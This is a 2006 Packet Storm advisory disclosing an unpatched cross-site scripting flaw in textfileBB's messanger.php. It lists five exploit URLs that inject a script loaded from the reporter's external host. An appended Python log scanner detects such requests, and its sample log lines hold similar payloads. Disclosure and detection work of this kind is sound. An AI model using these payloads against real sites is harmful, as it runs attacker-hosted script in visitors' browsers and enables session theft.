textfilebbmessanger.txt

2006-03-09T00:00:00
ID PACKETSTORM:44506
Type packetstorm
Reporter retard
Modified 2006-03-09T00:00:00

Description

                                        
`ORIGINAL: http://notlegal.ws/textfilebbmessanger.txt  
  
  
software: textfileBB  
vendor's website: http://tfbb.jcink.com/  
versions: <= 1.0  
class: remote  
status: unpatched  
exploit: available  
solution: not available  
discovered by: retard  
risk level: medium  
  
exploit(s):  
  
http://example.com/messanger.php?mess=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=MSN&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=YIM&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=ICQ&user=%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E  
http://example.com/messanger.php?p=AIM&user=%22%3E%3C/head%3E%3Cbody%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/body%3E%3C/html%3E  
  
credit:  
  
author(s): retard  
email: retard@30gigs.com  
`
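
A defender-side check for the requests listed above, as an added example that is not part of the original advisory: it scans web server access logs for messanger.php requests whose mess or user parameter decodes to markup characters. The combined log format, the /forum/ path, the example.invalid host and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows messanger.php reflecting into the page.
REFLECTED_PARAMS = ("mess", "user")
# Characters needed to open a tag or break out of a quoted attribute.
# A heuristic: a legitimate handle containing a quote would also match.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def inspect_target(target):
    """Return [(param, decoded_value)] for suspicious messanger.php requests."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/messanger.php"):
        return []
    # parse_qs percent-decodes once, so %3Cscript%3E is seen as <script>.
    query = parse_qs(parts.query, keep_blank_values=True)
    return [
        (name, value)
        for name in REFLECTED_PARAMS
        for value in query.get(name, [])
        if MARKUP.search(value)
    ]


def scan(lines):
    """Return [(line_number, findings)] for log lines that need review."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        findings = inspect_target(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Mar/2006:10:00:00 +0000] "GET /forum/messanger.php?p=MSN&user=alice%40example.org HTTP/1.1" 200 512',
    '192.0.2.11 - - [09/Mar/2006:10:00:05 +0000] "GET /forum/messanger.php?p=AIM&user=%22%3E%3Cscript%20src=http://example.invalid/x.js%3E HTTP/1.1" 200 640',
    '192.0.2.12 - - [09/Mar/2006:10:00:09 +0000] "GET /forum/messanger.php?mess=%3Cscript%20src=http://example.invalid/x.js%3E%3C/script%3E HTTP/1.1" 200 300',
    '192.0.2.13 - - [09/Mar/2006:10:00:12 +0000] "GET /forum/index.php?user=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

Values are decoded only once, so double-encoded input would need a second decoding pass before the check.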